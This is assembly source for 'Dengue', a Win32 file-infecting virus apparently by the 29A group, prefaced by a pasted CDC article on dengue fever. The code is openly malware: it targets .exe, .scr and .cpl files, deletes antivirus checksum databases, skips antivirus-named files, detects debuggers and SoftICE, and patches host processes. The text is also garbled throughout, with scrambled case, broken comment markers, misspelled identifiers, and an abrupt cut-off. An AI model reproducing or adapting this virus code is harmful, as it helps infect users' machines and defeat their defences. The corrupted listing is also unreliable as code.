; ================================================== ===========================
;
Dengue Hemorrhagic Fever
;
; BiOcode by GRIYO / 29A
Griyo@bi0.net
;
; ================================================== ===========================
;
About the Biomodel
; ------------------
;
Dengue Hemorrhagic Fever: The Emergence of A Global Health Problem
;
Dengue and Dengue Hemorrhagic Fever (DHF) Are Caused by One of Four
Closely Related, But Antigenical Distinct, Virus Serotypes (DEN-1, DEN-2,
DEN-3, AND DEN-4), of the genus flavivirus. Infection with one of these
; Serotypes Does Not Provide Cross-Protective Immunity, SO PERSONS LIVING INT
A dengue-endemic area can have four dengue infections during their
Lifetimes. dengue is primarily an urban disease of the Tropics, and the THE TROPICS, AND THE
Viruses That Cause IT Are Maintained in a Cycle That Involves Humans and
AEDES AEGYPTI, A DOMESTIC, DAY-Biting Mosquito That Prefers To Feed ON
Humans. Infection with a dengue Virus Serotype Can Produce a Spectrum of
Clinical Illness, Ranging from a nonspecific viRal Syndrome To Severe and
Fatal Hemorrhagic Disease. Important Risk Factors for DHF Include The; Strain and Serotype of The Virus Involved, AS Well As The Age, Immune
status, and getetic predisposition of the pattern.
;
The first reported epidemics of dengue fever occurred in 1779-1780
; In Asia, Africa, And North America; The Near Simultaneous Occurrence of
Outbreaks On Three Continents INDICES THAT THESE VIRUS AND t
; Mosquito Vector Have Had A WorldWide Distribution in THE Tropics for more
Than 200 Years. During Most of this Time, Dengue Fever Was Considered A
Benign, Nonfatal Disease of Visitors to the Tropics. Generally, There Were
Long Intervals (10-40 Years) Between Major Epidemics, Mainly Because The
viruses and their mosquito Vector Could Only Be Transported Between
Population centers by Sailing Vessels.
;
; A Global Pandemic of Dengue Begun in SoutHeast Asia After World
WAR II and HAS INTENSIFIED DURING The Last 15 Years. Epidemics Caused by
Multiple Serotypes (Hyperendemicity) Are Moreflight, The Geographic
; Distribution of Dengue Viruses Has Expanded, And DHF HAS Emerge in the
Pacific Region and The Americas. In Southeast Asia, Epidemic DHF
First Appeared in 1950s, But by 1975 it Had Become a Leading Cause of
Hospitalization and Death Among Children In Many Countries. in the 1980s,
DHF Began a Second Expansion Into Asia When Sri Lanka, India, And The
Maldive Islands Had Their First Major DHF Epidemics; Pakistan First
; rengorted an epidemic of dengue fever in 1994. The Recent Epidemics IN
Sri Lanka and India Were Associated with Multiple Dengue Virus Serotypes,
But den-3 Was Predominant and Was GeneTically Distinct from Den-3 Viruses
Previously Isolated from Infected Persons in Those Countries .;
; After an absence of 35 years, Epidemic Dengue Fever Occurred in
; Both Taiwan and The People's Republic of China In The 1980s. The people
; Republic of China Had a series of epidemics caused by All Four Serotypes,
And ITS First Major Epidemic of DHF, Caused by Den-2, Was Reported ON
Hainan island in 1985. Singapore Also Had A Resurgence of Dengue / DHF
From 1990 to 1994 After a successful control program HAD Prevented
Significant Transmission for over 20 years. In Other Countries of Asia
WHERE DHF Is Endemic, The Epidemics Have Become Progressively Larger in The
Last 15 Years.
;
; In the Pacific, Dengue Viruses Were Reintroduced in The Early 1970s
After an absence of more Than 25 years. Epidemic Activity Caused by all all
Four Serotypes Has Intensified in Recent Years With Major Epidemics of DHF
On Several Islands.
;
; Despite Poor Surveillance for Dengue in Africa, We know That
; Epidemic Dengue Fever Caused by All Four Serotypes Has Increased
; DRAMATILY SINECE 1980. MOST ACTIVITY HAS OCCURRED IN East Africa, And
Major Epidemics Were Reported for The First Time in The Seychelles (1977),
Kenya (1982, DEN-2), Mozambique (1985, DEN-3), Djibouti (1991-92, DEN-2),
Somalia (1982, 1993, DEN-2), And Saudi Arabia (1994, DEN-2) (CDC,
Unpublished Data). Epidemic DHF HAS BEEN Reported in Neither Africa Nor Thae
Middle East, But Sporadic Cases Clinically Compatible with DHF Have Been
; Reported from Mozambique, Djibouti, And Saudi Arabia (CDC, Unpublish
DATA).
;
; The Emergence of Dengue / DHF as a MAJOR PUBLIC Health PROBLEM HAS
BEEN MOST DRAMATIC IN The American Region. in An Effort to Prevent Urban
Yellow fever, Which is also transmitted by ae. aegypti, the panraft a campaign That EraDicated ae. aegypti from
Most Central and South American Countries in the 1950s and 1960s. as a
Result, Epidemic Dengue Occurred Only SPORADICLY in Some Caribbean
Islands during this period. The ae. Aegypti eraDICATION Program, Which Was
; Officially Discontinued In the United States in 1970, Gradually Eroded
Elsewhere, And this Species Began to Reinfest Countries from Which It Had
Been Eradicated. in 1995, The Geographic Distribution of AE. Aegypti WAS
Similar to ITS Distribution Before The EraDICATION Program.
;
; In 1970, ONLY DEN-2 Virus Was Present in The Americas, Although
DEN-3 May Have Had A Focal Distribution in Colombia and Puerto Rico. In
1977, DEN-1 WAS Introducesd and Caused Major Epidemics Throughout The
Region Over A 16-Year Period. DEN-4 WAS Introduces IN 1981 and Caused
Similar Widespread Epidemics. Also in 1981, A New Strain of Den-2 from
Southeast Asia Caused The First Major DHF Epidemic in The Americas (CUBA).
This Strain Has Spread Rapidly Throughout The Region and Has Caused
Outbreaks of DHF in Venezuela, Colombia, Brazil, French Guiana, Suriname,
And Puerto Rico. by 1995, 14 Countries in The American Region Had Reported
Confirmed DHF Cases, And DHF is endemic in Many of these Countries.
;
DEN-3 Virus Recently Reappeared in The Americas After An Absence of
; 16 years. This Serotype Was First Detected in Association with a 1994
Dengue / DHF Epidemic in Nicaragua. Almost Simultaneously, Den-3 WAS
Confirmed in Panama and, in Early 1995, In Costa Rica (CDC, Unpublished
; DATA). in nicaragua, considerable number number of dhf were associated with the
Epidemic, Which Was Apparently Caused by Den-3. in Panama and Costa Rica,
The Cases Were Classic Dengue Fever.
;
; ViRal Envelope Gene Sequence Data from The Den-3 Strains Isolated
From Panama and Nicaragua Have Shown That this New American Den-3 Virus
Strain Was LIKELY A Recent Introduction from Asia Since IT IS Genetically
Distinct from the den-3 Strain Found Previously IN The Americas, But IS
Identical to the den-3 Virus Serotype That Caused Major DHF EPIDEMICS IN
Sri Lanka and India In The 1980s (R. Lanciotti; Unpublished Data). The New
; DEN-3 strain, and the susceptibility of the population in the American
; Tropics To It, Suggests That Den-3 Will Spread Rapidly Throughout the
; Region and Likey Will Cause Major Epidemics of Dengue / DHF in the Near
FUTURE.
;
; In 1995, Dengue Is The Most Important Mosquito-Borne ViRal Disease
Affecting Humans; ITS Global Distribution is Comparable to That of Malaria,
; and an estimated 2.5 billion people area Living In area at risk for epidemic
Transmission. Each Year, Tens of Millions of Cases of Dengue Fever Occur
And, Depending on the year, up to hundreds of thousands of copy of dhf. The
Case-Fatality Rate of DHF IN MOST Countries IS About 5%: Most Fatal Cases
Are Among Children.
;
; There is a small, but significt, risk for dengue outbreaks in the
Continental United States. Two Competence Mosquito Vectors, AE. aegypti and
AEDES Albopictus, Are Present and, Under Circumstances, Each Could
Transmit Dengue Viruses. This Type of Transmission Has Been Detected TWICE
; in the last 15 years in South Texas (1980 and 1986) And Has Been Associated
WITH DENGUE Epidemics in Northern Mexico. Moreover, Numerous Viruses Are
Introduces Returly by Travelers Returning from Tropical Areas WHERE Dengue; Viruses Are Endemic. from 1977 To 1994, A Total of 2,248 Suspected Cases of
Imported Dengue Were Reported In Theneited State (CDC, Unpublished Data).
Although Some Specimens Collected WERE NOT ADEQUATE for Laboratory
Diagnosis, Preliminary Data Indicate That 481 (21%) Cases WERE Confirmed AS
Dengue (CDC, Unpublished Data). Many More Cases Probably Go Unreported EACH
Year Because Surveillance In The United States IS Passive and Relies ON
Physicians to Recognize the Disease, Inquire About The Patient's Travel
History, Obtain Proper Diagnostic Samples, And Report The Case. Thase Data
; underscore the fact this southern texas and the southeastern sets,
WHERE AE. AEGYPTI IS FOUND, Are At Risk for Dengue Transmission and
Sporadic Outbreaks.
;
; The Reasons for this Dramatic Global Emergence of Dengue / DHF As A
Major Public Health Problem Are Complex and Not Well Understood. However,
Several Important Factors Can Be Identified. First, Effective Mosquito
Control Is Virtually Nonexistent in Most Dengue-Endemic Countries.
Considerable Emphasis for the Past 20 Years Has Been Placed On
Ultra-low-volume INSECCIDE SPRAYS for Adult Mosquito Control, A
Relatively INEffective Approach for Controlling AE. Aegypti. SECOND, MAJOR
; Global Demographic Changes Have Occurred, The Most Important Of Which Have
BEEN UNCONTROLLED URBANIZATION AND CONCURRENT POPULATION GROWTH. THESE
Demographic Changes Have Resulted In Substandard Housing And INADequate
; Water, SEWER, AND WASTE Management Systems, All of Which Increase
AE. Aegypti Population Densities and Facilitate Transmission of Facilitate
AE. Aegypti-Borne Disease. Third, IncreaSed Travel by AirPlane Province; The Ideal Mechanism for Transporting Dengue Viruses Between Population
Centers of the Tropics, Resulting In a constant Exchange of Dengue Viruses, IN A CONSTANT Exchange
And Other Pathogens. Lastly, In Most Countries The Public Health
Infrastructure HAS DETERIORATED. LIMITED FINANCIAL AND HUMAN RESOURES AND
Competing priorities have resulted in a "Crisis Mentality" with EMPHASIS
On Implementing So-Called Emergency Control Methods in Response To
; Epidemics Rather Than Prevent Epidemic, PREVENT EPIDEMIC
Transmission. this approach has been particularly detrimental to dengue
Control Because, In Most Countries, Surveillance Is Very INADEQUATE; THE
System to Detect Increaged Transmission Normally Relies on Reports by Local
Physicians who offten do not consider dengue in their diagnose. As a result,
An Epidemic Has Offen Reached or Passed The Peak of Transmission Before IT
IS determcted.
;
No Dengue Vaccine is Available. Recently, However, Attenuated
Candidate Vaccine Viruses Have Been Developed in Thailand. Thase Vaccines
Area Safe and Immunogenic When Given in Various Formulation, Including A
Quadrivalent Vaccine for All Four Dengue Virus Serotypes. Unfortunately,
Efficacy Trials in Human Volunteers Have Yet to Be Initiated. Research IS
Also Being Conducted to Develop Second-Generation Rechabinant Vaccine
Viruses; The Thailand Attenuated Viruses Are Used As a Template. However,
An Effective Dengue Vaccine for Public Use Will Not Be Available for 5 To
10 Years.
;
ProSpects for Reversing The Recent Trend of Increased Epidemic
Activity and Geographic Expansion of Dengue Are Not Promising. New Dengue
Virus Strains and Serotypes Will Likely Continue To Be Introduces Into Many; Areas Where The Population Densities of AE. Aegypti Are AT High Levels. with
No New Mosquito Control Technology Available, in Recent Years Public Health
; Authorities Have Emphasesized Disease Prevention and Mosquito Control Through
Community Efforts to Reduce Larval Breeding Sources. Although this approach
Will Probably Be Effective In The Long Run, IT IS Unlikely To Impact Disease
Transmission in The Near Future. We Must, Therefore, Develop Improved,
, Proactive, Laboratory-Based Surveillance Systems That Can Provide Early
Warning of an impending dengue epidemic. At the Very Least, Surveillance
Results can alert the public to take action and physicians to diagnose and
Properly Treat Dengue / DHF Cases.
;
Duane J. GUBLER AND GARY G. CLARK
National Center for Infectious Diseases
Centers for Disease Control and Prevention
; Fort Collins, Colorado, And San Juan, Puerto Rico, USA
;
; ================================================== ===========================
.386P
Locals
Jumps
.Model flat, stdcall
Include Win32API.inc
INCLUDE USEFUL.INC
Include Mz.inc
INCLUDE PE.INC
Extrn getModuleHandlea: NEAR
EXTRN SLEEP: NEAR
Number_of_poly_layers EQU 04H; Max Number of Poly Decryptors
; ================================================== ===========================; Fake Host Used for Virus 1st generation
; ================================================== ===========================
_Text Segment DWORD USE32 PUBLIC 'CODE'
; ================================================== ===========
WE NEED THE CRC Lookup Table for the next steps
; ================================================== ===========
Host_code: xor EBP, EBP
Call make_crc_tbl
; ================================================== ===========; save the crc32 of 'kernel32.dll' Inside Virus Body
; ================================================== ===========
Mov ESI, Offset G1_Szkernel32
Call get_str_crc32
Mov DWORD PTR [CRCKERNEL32], EDX
; ================================================== ===========
; Save The CRC32 of 'GetProcaddress' Inside Virus Body
; ================================================== ===========
Mov ESI, Offset G1_SZGETPROCADDR
Call get_str_crc32
MOV DWORD PTR [CRCGETPROCADDR], EDX
; ================================================== ===========; Save the crc32 of infectable file extensions
; ================================================== ===========
Mov ESI, Offset G1_SZexe
Call get_str_crc32
MOV DWORD PTR [CRC32_SZEXE], EDX
Mov ESI, Offset G1_SZSCR
Call get_str_crc32
MOV DWORD PTR [CRC32_SZSCR], EDX
MOV ESI, Offset G1_SZCPL
Call get_str_crc32
MOV DWORD PTR [CRC32_SZCPL], EDX
; ================================================== ===========
; Save the CRC32 of some av files
; ================================================== ===========
MOV ECX, Numberofav
MOV ESI, Offset G1_AV_NAMES
MOV EDI, Offset TBLCRC32AV
Call save_crc_names
; ================================================== ===========; save the crc32 of expensiver.exe
; ================================================== ===========
Mov ESI, Offset G1_SZEXPLORER
Call get_str_crc32
MOV DWORD PTR [CRCSZEXPLORER], EDX
; ================================================== ===========
Save the crc32 of 'user32.dll'
; ================================================== ===========
Mov ESI, Offset G1_SZUSER32
Call get_str_crc32
Mov DWORD PTR [CRCSZUSER32], EDX
; ================================================== ===========; save the crc32 of 'psapi.dll'
; ================================================== ===========
Mov ESI, Offset G1_SZPSAPI
Call get_str_crc32
MOV DWORD PTR [CRCSZPSAPI], EDX
; ================================================== ===========
; Save the crc32 of 'imagehlp.dll'
; ================================================== ===========
MOV ESI, Offset G1_SzIMGHLP
Call get_str_crc32
MOV DWORD PTR [CRCSZIMGHLP], EDX
; ================================================== ===========; save the crc32 of 'sfc.dll'
; ================================================== ===========
MOV ESI, Offset G1_SZSFC
Call get_str_crc32
MOV DWORD PTR [CRCSZSFC], EDX
; ================================================== ===========
Get CRC's of Needed API's and Save Theim Inside Virus Body
; Lets Start with keNel32 API Names
; ================================================== ===========
MOV ECX, Numk32apis
Mov ESI, Offset Namesk32apis
Mov Edi, Offset CRC32K32APIS
Call save_crc_names
; ================================================== ===========; this area Some Special Handled API
; ================================================== ===========
MOV ECX, 00000001H
Mov ESI, Offset Name_IndebuggerPresent
Mov Edi, Offset CRC32_ISDEBUGPR
Call save_crc_names
; ================================================== ===========
Get Toolhelp API (Windows 9x Only)
; ================================================== ===========
MOV ECX, NumToolhelPapis
Mov ESI, Offset Namestool Helpapis
Mov Edi, Offset CRC32TOOLHELPAPIS
Call save_crc_names
; ================================================== ===========; get psapi.dll apis (Windows NT & Windows 2000 ONLY)
; ================================================== ===========
MOV ECX, Numpsapiapis
Mov ESI, Offset Namespsapiapis
Mov Edi, Offset CRC32PSAPIAPIAPIS
Call save_crc_names
; ================================================== ===========
; Get API Used to Compute Image Checksum
; ================================================== ===========
MOV ECX, NumImghlPapis
Mov ESI, Offset NamesImghlpapis
Mov Edi, Offset CRC32IMGHLPAPIS
Call save_crc_names
; ================================================== ===========; Get API Used to Check for Windows2000 System File Protection
; ================================================== ===========
MOV ECX, NUMSFCAPIS
Mov ESI, Offset NamessFCapis
Mov Edi, Offset CRC32SFCAPIS
Call save_crc_names
; ================================================== ===========
Get CRC32 of User32 API Names (ANSI Version)
; ================================================== ===========
Mov ECX, Numuser32APIS
Mov ESI, Offset NamesUser32APISW9X
Mov Edi, Offset CRC32USER32APISW9X
Call save_crc_names
; ================================================== ===========; Get CRC32 of User32 API Names (Wide Version)
; ================================================== ===========
Mov ECX, Numuser32APIS
Mov ESI, Offset NamesUser32apiswnt
Mov Edi, Offset CRC32USER32APISWNT
Call save_crc_names
; ================================================== ===========
Build the do-not-infect-file-by-name crc32 table
; ================================================== ===========
MOV ECX, Avoid_Num
MOV ESI, Offset G1_AVOID_FILES
Mov Edi, Offset Avoid_TBL
Call save_crc_names
; ================================================== ===========; Get Kernel32.dll Module Handle
; ================================================== ===========
Push Offset G1_Szkernel32
Call getModuleHandlea
OR EAX, EAX
JZ OUT_1ST_GEN
MOV EBX, EAX
XOR EBP, EBP
DB 05H DUP (90h)
Call get1st_end
DB 05H DUP (90h)
; ================================================== ===========
Let the 1st generation host Running
; ================================================== ===========
OUT_1ST_GEN: PUSH 0FFFFFFFFH
Call Sleep
JMP OUT_1ST_GEN; Never Executed, But I DONT WANT to Remove IT
Anyway, this Wont Take Part of the Main
virus body ...
; ================================================== ===========; Ready to Jump Into Main Virus Body !!!!
; ================================================== ===========
Get1st_end: Push EAX; Space for EBX
Push Eax; Space for ESI
Push Eax; Space for EDI
Push EAX; Space for EBP
XOR EBP, EBP
JMP Entry_1st_gen
; ================================================== ===========
Routine That Converts API Names in CRC32 VALUES
; ================================================== ===========
Save_crc_names: CLD
GET_G1_CRC: PUSH ECX
Lodsd
PUSH ESI
Mov ESI, EAX
Call get_str_crc32
MOV EAX, EDX
Stosd
POP ESI
POP ECX
Loop get_g1_crc
RET
_Text Ends
; ================================================== ===========================; Here Comes The Rest of the Sections in Virus 1st generation
; ================================================== ===========================
_Data segment dword use32 public 'data'
; ================================================== ===========
Used to locate kernel32 base address on 1st generation
; ================================================== ===========
G1_SZKERNEL32 DB 'KERNEL32.DLL', 00H
G1_SZGETPROCADDR DB 'GETPROCADDRESS', 00H
; ================================================== ===========; used to check if file extension is infectable
; ================================================== ===========
G1_szexe db '.exe', 00H
G1_SZSCR DB '.SCR', 00H
G1_szcpl db '.cpl', 00H
; ================================================== ===========
; This Virus Use CRC32 INSTEAD OF DLL NAMES !!!!
;
; LoadLibrary Requires The DLL Name As Parameter ... but
WE CAN FIND The DLL Name by Browsing System32 Directory
For A File Whose CRC32 Matches a Given ONE
; ================================================== ===========
G1_SZEXPLORER DB 'Explorer.exe', 00H
G1_szuser32 db 'user32.dll', 00h
G1_SZPSAPI DB 'Psapi.dll', 00H
G1_szimghlp db 'imagehlp.dll', 00h
G1_szsfc db 'sfc.dll', 00h; ======================================== ====================
; Do Not Infect Files with this Character Combinations on
; their name
; ================================================== ===========
G1_AVOID_FILES EQU $
DD OFFSET G1_AVOID_00
DD Offset G1_AVOID_01
DD Offset G1_AVOID_02
DD Offset G1_AVOID_03
DD Offset G1_AVOID_04
DD Offset G1_AVOID_05
DD Offset G1_AVOID_06
DD Offset G1_AVOID_07
DD Offset G1_AVOID_08
DD Offset G1_AVOID_09
DD Offset G1_AVOID_0A
DD Offset G1_AVOID_0B
DD Offset G1_AVOID_0C
DD Offset G1_AVOID_0D
DD Offset G1_AVOID_0E
DD Offset G1_AVOID_0F
DD Offset G1_AVOID_10
DD Offset G1_AVOID_11
DD Offset G1_AVOID_12
DD Offset G1_AVOID_13
DD Offset G1_AVOID_14
DD Offset G1_AVOID_15
DD Offset G1_AVOID_16
DD Offset G1_AVOID_17
DD Offset G1_AVOID_18
Avoid_Num EQU ($ -G1_avoid_files) / 04H
G1_AVOID_00 DB 'DR', 00H
G1_avoid_01 db 'pa', 00H
G1_AVOID_02 DB 'RO', 00H
G1_AVOID_03 DB 'VI', 00H
G1_AVOID_04 DB 'AV', 00H
G1_AVOID_05 DB 'to', 00H
G1_AVOID_06 DB 'CA', 00H
G1_AVOID_07 DB 'IN', 00H
G1_AVOID_08 DB 'MS', 00H
G1_AVOID_09 DB 'SR', 00H
G1_AVOID_0A DB 'SP', 00H
G1_AVOID_0B DB 'RP', 00H
G1_avoid_0c db 'pr', 00hg1_avoid_0d db 'NO', 00H
G1_AVOID_0E DB 'CE', 00H
G1_AVOID_0F DB 'Le', 00H
G1_avoid_10 db 'mo', 00H
G1_AVOID_11 DB 'SM', 00H
G1_AVOID_12 DB 'DD', 00H
G1_AVOID_13 DB 'SO', 00H
G1_avoid_14 db 'sq', 00H
G1_avoid_15 db 'ex', 00H
G1_AVOID_16 DB 'IE', 00H
G1_AVOID_17 DB 'cm', 00H
G1_avoid_18 db 'co', 00H
; ================================================== ===========
DELETE THIS AV FILES
; ================================================== ===========
G1_AV_NAMES EQU $
DD OFFSET G1_DELETE_00
DD offset g1_delete_01
DD Offset G1_Delete_02
DD offset g1_delete_03
DD offset g1_delete_04
NUMBEROFAV EQU ($ -G1_AV_NAMES) / 04H
G1_DELETE_00 DB 'AVP.CRC', 00H
G1_DELETE_01 DB 'Anti-vir.dat', 00h
G1_DELETE_02 DB 'CHKLIST.CPS', 00H
G1_DELETE_03 DB 'Chklist.ms', 00h
G1_DELETE_04 DB 'IVP.NTZ', 00H
; ================================================== ===========
Kernel32.dll API Names;
Note That THIS TABLES AND STRINGS Are Not Included INTO THE
Virus body after 1st generation. Only CRC32 VALUES
; ================================================== ===========
Namesk32apis EQU $
DD Offset G1_CREATEFILEA
DD Offset G1_CREATEFILEMAPPINGA
DD Offset G1_CreateProcessa
DD Offset G1_CreateThread
DD Offset G1_CloseHandle
DD Offset G1_Deletefilea
DD Offset G1_EXITTHREAD
DD Offset G1_FindClose
DD Offset G1_FindFirstFilea
DD Offset G1_FindNextFilea
DD Offset G1_Freelibrary
DD Offset G1_GetComputernamea
DD Offset G1_GetcurrentProcess
DD Offset G1_GetdriveTypea
DD Offset G1_GetFileAttributesa
DD Offset G1_GetLastError
DD Offset G1_GETLOCALTIME
DD Offset G1_GetLogicalDriveStrings
DD Offset G1_GetsystemDirectorya
DD Offset G1_GetVersionex
DD Offset G1_LoadLibrarya
DD Offset G1_MapViewOffile
DD Offset G1_OpenFileMappinga
DD Offset G1_OpenProcess
DD Offset G1_ReadProcessMemory
DD Offset G1_SETENDOFFILE
DD Offset G1_setFileAttributesa
DD Offset G1_setFilePointer
DD Offset G1_setFileTime
DD Offset G1_SLEP
DD Offset G1_UnmapViewoffile
DD Offset G1_WriteProcessMemory
G1_createfilea DB 'CreateFilea', 00H
G1_createfilemappinga db 'createfilemappinga', 00H
G1_createProcessa DB 'CreateProcessa, 00h
G1_createthread DB 'CreateThread', 00H
G1_CloseHandle DB 'CloseHandle', 00H
G1_DELETEFILEA DB 'DELETEFILEA', 00H
G1_EXITTHREAD DB 'EXIXITTHREAD', 00H
G1_FindClose DB 'FindClose', 00hg1_FindFirstFilea DB 'FindfirstFilea', 00H
G1_FindNextFilea DB 'FINDNEXTFILEA', 00H
G1_FREELIBRARY DB 'FREELIBRARY', 00H
G1_getcomputernamea DB 'getcomputernamea', 00H
G1_getcurrentProcess DB 'getCurrentProcess', 00H
G1_GetdriveTypea DB 'getDriveTypea', 00H
G1_GETFileAttributesa DB 'getFileAttributesa', 00H
G1_getlasterror db 'getLastError', 00h
G1_getlocaltime db 'getLocalTime', 00H
G1_GetLogicalDriveStringsa DB 'getLogicalDriveStringsa', 00H
G1_GetsystemDirectorya DB 'getSystemDirectorya, 00H
G1_loadLibrarya DB 'loadingLibrarya', 00H
G1_getversionEx DB 'getversionExa', 00H
G1_mapviewoffile db 'mapviewoffile', 00H
G1_openfilemappinga db 'openfilemappinga', 00H
G1_OpenProcess DB 'OpenProcess', 00H
G1_ReadProcessMemory DB 'ReadProcessMemory', 00H
G1_setenDoffile db 'setndoffile', 00h
G1_setfileAttributesa DB 'setFileAttributesa', 00H
G1_setfilepointer db 'setfilepointer', 00h
G1_setfiletime db 'setfiletime', 00H
G1_Sleep DB 'Sleep', 00h
G1_unmapviewoffile db 'unmapviewoffile', 00H
G1_WriteProcessMemory DB 'WriteProcessMemory', 00h
; ================================================== ===========
Special kernel32 APIS
; ================================================== =========== Name_IndebuggerPresent DD Offset G1_IndebuggerPresent
G1_ISDebuggerPresent DB 'IsdebuggerPresent', 00H
; ================================================== ===========
; TOOLHELP APIS
; ================================================== ===========
NameStoolHelpapis Equ $
DD Offset G1_CreateToolhelp32Snapshot
DD Offset G1_Process32First
DD Offset G1_Process32Next
DD Offset G1_Module32First
DD Offset G1_Module32Next
G1_createtoolhelp32snapshot db 'CreateToolhelp32Snapshot', 00H
G1_Process32First DB 'Process32First', 00h
G1_Process32Next DB 'Process32Next', 00h
G1_Module32First DB 'Module32First', 00H
G1_Module32Next DB 'Module32Next', 00h
; ================================================== ===========; psapi.dll API Names
; ================================================== ===========
NameSPsapiapis Equ $
DD Offset G1_ENUMPROCESSMODULES
DD Offset G1_enumProcesses
DD Offset G1_GETMODULEBASENAMEA
DD Offset G1_GetModuleInformation
G1_ENUMPROCESSMODULES DB 'EnumprocessModules', 00H
G1_ENUMPROCESSS DB 'Enumprocesses', 00H
G1_getmodulebasenamea DB 'getModuleBasenamea', 00H
G1_getmoduleinformation DB 'getModuleInformation', 00H
; ================================================== ===========
; Sfc.dll API Names
; ================================================== ===========
Namessfcapis EQU $
DD Offset G1_SFCISFILEPROTECTED
G1_sfcisfileprotected db 'sfcisfileprotected', 00H
; ================================================== ===========; Imagehlp.dll API Names
; ================================================== ===========
NameSIMGHLPAPIS EQU $
DD Offset G1_ChecksumMappedFile
G1_ChecksummappedFile DB 'ChecksumMappedfile', 00H
; ================================================== ===========
User32.dll API Names (ANSI VERSION)
; ================================================== ===========
NamesUser32apisw9x EQU $
DD Offset G1W9X_DEFWINDOWPROC
G1W9X_DEFWINDOWPROC DB 'DEFWINDOWPROCA', 00H
; ================================================== ===========; user32.dll API Names (Wide Version)
; ================================================== ===========
NamesUser32apiswnt EQU $
DD Offset G1WNT_DEFWINDOWPROC
G1WNT_DEFWINDOWPROC DB 'DEFWINDOWPROCW', 00H
_Data Ends
_BSS Segment DWORD USE32 PUBLIC 'BSS'
_BSS Ends
; ================================================== ===========================
ViRal Section
;
You Have to Understand That All The Above-Mentioned Is Not Part of The Virus
THIS Means That The Text Strings and Other Information Previous To this
Point Will Be Discarded
; ================================================== ============================ virseg segment dword use32 public 'dengue'
; ================================================== ===========
Get Delta Offset in EBP
; ================================================== ===========
Viro_sys: Call Hostdelta
Hostdelta: POP EBP
Sub EBP, Offset Hostdelta
; ================================================== ===========
Create CRC32 Lookup Table ... this Virus Uses CRC32 in Lots
; Of Places Along ITS Code ... Precalculated Tables Helps to
Really Speed-Up Virus Activitie
; ================================================== =========== Call make_crc_tbl
; ================================================== ===========
Check CRC32 of Main Virus Body
;
ESI -> PTR TO BUFFER
; ECX -> Buffer Size
; ================================================== ===========
Mov ECX, SizeoftProtect
LEA ESI, DWORD PTR [EBP CRC_PROTECTED]
Call get_crc32
; ================================================== ===========
Checksum matches?
; ================================================== ===========
DB 0B8H; MOV EAX, IMM
ViRalchecksum DD 00000000HCMP Eax, EDX
JNE Critical_ERROR
CRC_PROTECTED EQU $
; ================================================== ===========
Scan System Memory Looking for kernel32.dll
; ================================================== ===========
Kernelscanning: Pushad
FK32_TRY_01: MOV EAX, 080000101H
Call IgetNTBaseAddr
JECXZ FK32_TRY_02
JMP short kernel_found
FK32_TRY_02: MOV EAX, 0C0000101H
Call IgetNTBaseAddr
JECXZ FK32_TRY_03
JMP short kernel_found
FK32_TRY_03: XOR EAX, EAX
Call IgetNTBaseAddr
Kernel_found: Jecxz critical_ERROR
Mov DWORD PTR [ESP.PUSHAD_EBX], ECX
Popad
; ================================================== ===========
This is the entry-point for 1st generation
Now EBX POINTS TO KERNEL32.DLL BASE Address
; ================================================== =========== Entry_1st_gen: Mov DWORD PTR [EBP Hkernel32], EBX
; ================================================== ===========
; Search for getProcaddress Entry-Point
; ================================================== ===========
Call getGetProcaddr
Jecxz critical_error
MOV DWORD PTR [EBP A_GETPROCADDRESS], ECX
; ================================================== ===========
Get Kernel32 API Addresses
; ================================================== ===========
MOV ECX, Numk32apis
LEA ESI, DWORD PTR [EBP CRC32K32APIS] Lea EDI, DWORD PTR [EBP EPK32APIS]
Call get_apis
Jecxz Restorehost
; ================================================== ===========
Everyhes Have to Work, Buti Something Goes Wrong this
Will Halt The Process
; ================================================== ===========
Critical_ERROR: JMP critical_ERROR
; ================================================== ===========
Restore Host Code
;
Make The Return Address Point To The Instruction Which
Made the Call
; ================================================== ===========
API_PUSH_SIZE EQU 00000004H * 00000004H
RESTOREHOST: Lea ESI, DWORD PTR [ESP API_PUSH_SIZE]
Sub DWORD PTR [ESI], 00000005H
CLD
Lodsd
LEA ESI, DWORD PTR [EBP EP_BYTES]]
PUSH ESI
Push 00000005H
Call get_org_codeorg_code db 05h DUP (90H)
GET_ORG_CODE: PUSH EAX
Call DWORD PTR [EBP A_GETCURRENTPROCESS]
Push EAX
Call DWORD PTR [EBP A_WRITEPROCESSMORY]
OR EAX, EAX
JZ Critical_ERROR
CLD
Lodsd
CMP EAX, 00000005H
JNE Critical_ERROR
; ================================================== ===========
; Try to Locate IsdebuggerPresent API
; ================================================== ===========
MOV ECX, 00000001H
LEA ESI, DWORD PTR [EBP CRC32_ISDEBUGPR]
Lea EDI, DWORD PTR [EBP A_IDEBUGERPRESENT]
Call get_apis
Jecxz detectdebug
JMP Short Si_lookup
; ================================================== ===========
Check if the current process is running in the context of a
Debugger
; ================================================== ===========
Detectdebug: Call DWORD PTR [EBP A_ISDEBUGERPRESENT] or Eax, EAX
JNZ GOBACK2HOST
; ================================================== ===========
Softice Lookup
;
Code based on the article "Win32 Anti-Debugging Tricks" by
Billy BelceBu / Ikx (Published on Xine # 4)
; ================================================== ===========
Si_lookup: MOV ESI, DWORD PTR [EBP A_CREATEFILEA]
Push ECX
Push file_attribute_readonly
Push Open_EXISTING
Push ECX
Push file_share_read
Push generic_read
Call get_szsiw9x
DB '//./sice' ,00h
Get_szsiw9x: Call ESI
CMP EAX, INVALID_HANDLE_VALUE
JNE Si_Found
Push 00000000H
Push file_attribute_readonly
Push Open_EXISTING
Push 00000000H
Push file_share_read
Push generic_read
Call get_szsiwnt
DB '//./ntice' ,00h
GET_SZSIWNT: CALL ESI
CMP EAX, INVALID_HANDLE_VALUE
JE SI_NOTFOUND
Si_Found: Push EAX
Call DWORD PTR [EBP A_CLOSEHANDLE]
JMP GOBACK2HOST
; ================================================== ===========
Get a Object name based on current hostname; ======================================== ====================
Si_NotFound: Lea EDI, DWORD PTR [EBP SIZEOFComputername]]
Push EDI
MOV Eax, 00000020H
CLD
Stosd
Push EDI
Call DWORD PTR [EBP A_GETComputerName]
OR EAX, EAX
JZ GOBACK2HOST
MOV ESI, EDI
Call get_str_crc32
Movzx ECX, Byte Ptr [EDI]
And ECX, 00000003H; Number of Characters
Inc ECX
Lea EDI, DWORD PTR [EBP SZOBJECTNAME]
LoopBuildnick: MOV Al, DL
And Al, 0FH
Add Al, 'A'; Get Character
Stosb
SHR EDX, 04H
Loop loopbuildnick
Mov Eax, 00003233H
Stosd
MOV Al, Cl
Stosb
; ================================================== ===========
ALLOCATE Shared Memory
;
MSDN SAYS:
;
"A Shared file-mapping object will not be destroyed uncle
